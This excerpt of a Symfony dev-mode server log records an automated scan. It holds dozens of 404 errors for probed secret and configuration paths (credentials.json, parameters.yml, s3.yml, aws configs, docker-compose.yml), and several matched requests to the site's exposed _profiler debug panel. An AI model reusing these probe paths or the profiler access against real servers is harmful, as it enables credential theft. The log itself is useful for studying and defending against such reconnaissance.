  8051. [2025-12-20 20:18:21] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/default.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/default.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8052. [2025-12-20 20:18:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/dev/config.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/dev/config.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8053. [2025-12-20 20:18:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/development.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/development.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8054. [2025-12-20 20:19:04] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/local.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/local.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8055. [2025-12-20 20:19:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/model.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/model.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8056. [2025-12-20 20:19:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/parameters.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/parameters.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8057. [2025-12-20 20:19:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/parameters.yml.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/parameters.yml.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8058. [2025-12-20 20:20:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/php.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/php.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8059. [2025-12-20 20:20:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/prod.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/prod.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8060. [2025-12-20 20:20:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/production.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/production.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8061. [2025-12-20 20:20:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c7bb2b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c7bb2b?panel=logger","method":"GET"} []
  8062. [2025-12-20 20:20:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  8063. [2025-12-20 20:20:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a26a5e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a26a5e?panel=config","method":"GET"} []
  8064. [2025-12-20 20:20:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8065. [2025-12-20 20:20:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/s3.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/s3.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8066. [2025-12-20 20:21:27] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/settings.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/settings.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8067. [2025-12-20 20:21:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/sitemap.rb"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/sitemap.rb\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8068. [2025-12-20 20:21:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/staging.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/staging.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8069. [2025-12-20 20:22:06] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config/test.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config/test.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8070. [2025-12-20 20:22:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /config_tmp.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /config_tmp.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8071. [2025-12-20 20:22:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs/application.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs/application.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8072. [2025-12-20 20:22:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs/aws.config.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs/aws.config.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8073. [2025-12-20 20:22:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configs/s3_config.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configs/s3_config.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8074. [2025-12-20 20:23:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.json.dist"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.json.dist\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8075. [2025-12-20 20:23:26] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /constants.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /constants.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8076. [2025-12-20 20:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /constants.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /constants.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8077. [2025-12-20 20:23:40] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /constants.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /constants.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8078. [2025-12-20 20:23:44] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /constants.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /constants.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8079. [2025-12-20 20:23:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.csv"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.csv\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8080. [2025-12-20 20:23:58] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8081. [2025-12-20 20:24:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8082. [2025-12-20 20:24:12] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8083. [2025-12-20 20:24:17] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.properties"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.properties\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8084. [2025-12-20 20:24:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8085. [2025-12-20 20:24:30] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /credentials_aws.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /credentials_aws.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8086. [2025-12-20 20:24:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data/credentials.ini"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data/credentials.ini\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8087. [2025-12-20 20:24:50] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /default.ts"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /default.ts\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8088. [2025-12-20 20:24:56] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /defaults.yaml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /defaults.yaml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8089. [2025-12-20 20:27:00] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /docker-compose.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /docker-compose.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8090. [2025-12-20 20:27:07] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8091. [2025-12-20 20:27:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /emailconfig.toml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /emailconfig.toml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8092. [2025-12-20 20:27:33] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /frontend_dev.php/$"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /frontend_dev.php/$\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8093. [2025-12-20 20:27:46] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /helper/helper.go"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /helper/helper.go\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8094. [2025-12-20 20:28:08] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /heroku.yml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /heroku.yml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8095. [2025-12-20 20:28:16] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /hosting.json"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /hosting.json\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
